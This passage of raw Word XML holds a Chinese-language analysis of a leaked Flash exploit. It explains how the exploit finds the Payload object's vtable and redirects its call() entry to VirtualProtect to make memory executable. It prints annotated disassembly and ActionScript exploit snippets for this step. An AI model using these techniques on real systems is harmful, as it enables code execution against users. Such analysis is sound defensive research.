          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code最终会调用</w:t>
      </w:r>
      <w:r w:rsidR="00971FBF" w:rsidRPr="00971FBF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FunctionObject::AS3_call</w:t>
      </w:r>
      <w:r w:rsidR="00971FBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971FBF" w:rsidRDefault="00D973FE" w:rsidP="00F134FD">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA79BBB" wp14:editId="5E048120">
            <wp:extent cx="4819048" cy="1295238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5B" w:rsidRDefault="00ED2E5B" w:rsidP="00964433">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内部会调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>core()-&gt;exec</w:t>
      </w:r>
      <w:r w:rsidR="00686EAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;call(get_callEnv(), thisArg, argc, argv);</w:t>
      </w:r>
      <w:r w:rsidR="00964433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说Payload.call会</w:t>
      </w:r>
      <w:r w:rsidR="00FC654D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跳转到</w:t>
      </w:r>
      <w:r w:rsidR="00964433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidR="00964433" w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call(get_callEnv(), thisArg, argc, argv)</w:t>
      </w:r>
      <w:r w:rsidR="00FC654D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并最终跳转到Payload对象JIT出来的代码</w:t>
      </w:r>
      <w:r w:rsidR="00964433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，由于</w:t>
      </w:r>
      <w:r w:rsidR="00964433" w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="00964433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>里的参数个数和VirtualProtect参数个数一样，所以可以通过修改call函数的压栈参数实现VirtualProtect的调用。</w:t>
      </w:r>
      <w:r w:rsidR="000E4C3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再来看下</w:t>
      </w:r>
      <w:r w:rsidR="000E4C3D" w:rsidRPr="00971FBF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FunctionObject::AS3_call</w:t>
      </w:r>
      <w:r w:rsidR="000E4C3D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的汇编代码：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1A05" w:rsidTr="00791A05">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr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int AS3_call(void *this, int thisArg, int *argv, int argc)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ebx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esi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="00BF68B7" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF68B7">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>mov     esi, ecx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ecx, [esp+8+thisArg]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eax, [esi]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edx, [eax+8Ch]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edi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ecx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ecx, esi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006A57F6" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A57F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>call    edx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ebx, eax</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="00BF68B7" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF68B7">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     eax, [esi+8]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="006B245B" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     ecx, [ea</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidR="0092041C" w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>+14h]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     edx, [ecx+4]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eax, [esi]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     edi, [edx+0B0h]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edx, [eax+90h]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lea     ecx, [esp+0Ch+thisArg]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ecx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ecx, esi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006A57F6" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A57F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>call    edx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ecx, [esp+0Ch+argv]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eax, [eax]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     edx, [edi]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B245B">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>mov     edx, [edx+1Ch]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ecx</w:t>
            </w:r>
            <w:r w:rsidR="009E10A8">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">                 </w:t>
            </w:r>
            <w:r w:rsidR="009E10A8" w:rsidRPr="00462FDE">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">//forge to </w:t>
            </w:r>
            <w:hyperlink w:history="1">
              <w:r w:rsidR="00573175" w:rsidRPr="00731F5E">
                <w:rPr>
                  <w:color w:val="70AD47" w:themeColor="accent6"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>lpflOldProtect</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00573175">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0055708D">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidR="00A33EF6">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidR="009F1B5B">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0055708D">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>argv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ecx, [esp+10h+argc]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ecx</w:t>
            </w:r>
            <w:r w:rsidR="004E33CE">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">                 </w:t>
            </w:r>
            <w:r w:rsidR="004E33CE" w:rsidRPr="00462FDE">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">//forge to </w:t>
            </w:r>
            <w:r w:rsidR="002B06A2" w:rsidRPr="0097254F">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>flNewProtect</w:t>
            </w:r>
            <w:r w:rsidR="002B06A2">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006D104A">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;= argc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="00693882" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0092041C">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>push    ebx</w:t>
            </w:r>
            <w:r w:rsidR="00DA529A">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">                 </w:t>
            </w:r>
            <w:r w:rsidR="009921F9" w:rsidRPr="00693882">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="00A66155" w:rsidRPr="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>forge to</w:t>
            </w:r>
            <w:r w:rsidR="00BD4AE6">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002B06A2" w:rsidRPr="00462FDE">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>dwSize</w:t>
            </w:r>
            <w:r w:rsidR="002B06A2">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001D5006">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;= p+0x</w:t>
            </w:r>
            <w:r w:rsidR="00D65A24">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>20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push    eax</w:t>
            </w:r>
            <w:r w:rsidR="002527A6">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">               </w:t>
            </w:r>
            <w:r w:rsidR="002527A6" w:rsidRPr="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002527A6" w:rsidRPr="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="00A801EB" w:rsidRPr="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">forge to </w:t>
            </w:r>
            <w:r w:rsidR="00573175" w:rsidRPr="00462FDE">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>lpAddress</w:t>
            </w:r>
            <w:r w:rsidR="00573175">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007A5B2A">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;= p+0x</w:t>
            </w:r>
            <w:r w:rsidR="00D65A24">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1C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mov     ecx, edi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="006B245B" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006A57F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>call    edx</w:t>
            </w:r>
            <w:r w:rsidR="00042560" w:rsidRPr="006A57F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00042560">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">                </w:t>
            </w:r>
            <w:r w:rsidR="00042560" w:rsidRPr="00D44155">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00042560" w:rsidRPr="00D44155">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidR="00FB2553" w:rsidRPr="00731F5E">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> forge </w:t>
            </w:r>
            <w:r w:rsidR="00C9607C" w:rsidRPr="00D44155">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>to VirtualProtect</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E35" w:rsidRPr="00D44155">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> VA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pop     edi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pop     esi</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0092041C" w:rsidRPr="0092041C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pop     ebx</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00791A05" w:rsidRDefault="0092041C" w:rsidP="0092041C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0092041C">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>retn    0Ch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00791A05" w:rsidRDefault="00686EAC" w:rsidP="00964433">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>该段代码中有3次 call分别对应了</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>core()-&gt;exec</w:t>
      </w:r>
      <w:r w:rsidR="00DA6A91">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;call</w:t>
      </w:r>
      <w:r w:rsidR="007E5BBF">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，观察最后一个call</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> edx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007D4F00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>此时edx中应该保存的就是</w:t>
      </w:r>
      <w:r w:rsidR="007D4F00" w:rsidRPr="00ED2E5B">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidR="007D4F00">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007D4F00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的函数地址，跟踪edx，如上</w:t>
      </w:r>
      <w:r w:rsidR="006B245B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>标</w:t>
      </w:r>
      <w:r w:rsidR="007D4F00">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蓝片段，</w:t>
      </w:r>
      <w:r w:rsidR="008B2FB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可知道Payload对象</w:t>
      </w:r>
      <w:r w:rsidR="00F74E76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vtable</w:t>
      </w:r>
      <w:r w:rsidR="008B2FB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E4C3D" w:rsidRDefault="008B2FB6" w:rsidP="00964433">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2FB6">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var ptbl:uint = Get(Get(Get(Get(p + 8) + 0x14) + 4) + (_isDbg ? 0xbc:0xb0));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2FB6" w:rsidRDefault="008B2FB6" w:rsidP="00964433">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的由来了</w:t>
      </w:r>
      <w:r w:rsidR="00DD10DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，同时call()函数位于该虚函数表偏移0x</w:t>
      </w:r>
      <w:r w:rsidR="00DD10DE">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1C</w:t>
      </w:r>
      <w:r w:rsidR="00DD10DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F3A18" w:rsidRDefault="001F3A18" w:rsidP="00964433">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得了虚表的</w:t>
      </w:r>
      <w:r w:rsidR="00B91DB0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00B91DB0">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后，exploit程序备份了虚表VA前后0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>400 bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的数据，然后修改[vtable+0x1c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]=</w:t>
      </w:r>
      <w:r w:rsidR="00042560" w:rsidRPr="00042560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042560">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VirtualProtect，并将</w:t>
      </w:r>
      <w:r w:rsidR="009B7A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>压栈参数修改为VirtualProtect需要的参数</w:t>
      </w:r>
      <w:r w:rsidR="00DE100E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00113794" w:rsidRPr="00113794">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以最后在</w:t>
      </w:r>
      <w:r w:rsidR="00113794" w:rsidRPr="00113794">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AS3层调用VirtualProtect就变成了：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3794" w:rsidTr="00113794">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
          </w:tcPr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// set first arg for VirtualProtect()</w:t>
            </w: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Set(p+0x1c, xAddr);</w:t>
            </w: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// set second arg</w:t>
            </w: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Set(p+0x20, xLen);</w:t>
            </w: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// set third arg = 0x40 PAGE_EXECUTE_READWRITE</w:t>
            </w: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var args:Array = new Array(0x41);</w:t>
            </w:r>
            <w:r w:rsidRPr="00113794">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00113794">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00113794">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00113794" w:rsidRPr="00113794" w:rsidRDefault="00113794" w:rsidP="00113794">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pP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// replace vtable pointer in Payload()</w:t>
            </w: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Set(ptbl, _vAddr + 0x80);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00113794" w:rsidRPr="00113794" w:rsidRDefault="00113794" w:rsidP="00113794">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00113794" w:rsidRP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// call VirtualProtect()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00113794" w:rsidRDefault="00113794" w:rsidP="00113794">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00113794">
              <w:rPr>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>var res = Payload.call.apply(null, args);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00113794" w:rsidRPr="00113794" w:rsidRDefault="00113794" w:rsidP="00113794">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>观察</w:t>
      </w:r>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HackTeam用的代码中并没有直接call，而是call.apply，其实是仅仅为了书写方便而已，写成Payload.call(null,null,…null)，共0×41个null也是可用的。之所以是0×41而不是0×40，是因为第一个null为调用者而不是函数参数。call(object, param1, param2…)和apply(object, new Array(param1,param2…))是等价的。args按说完全是参数数组了，长度还要设置为0×41是因为apply的调用者为call</w:t>
      </w:r>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
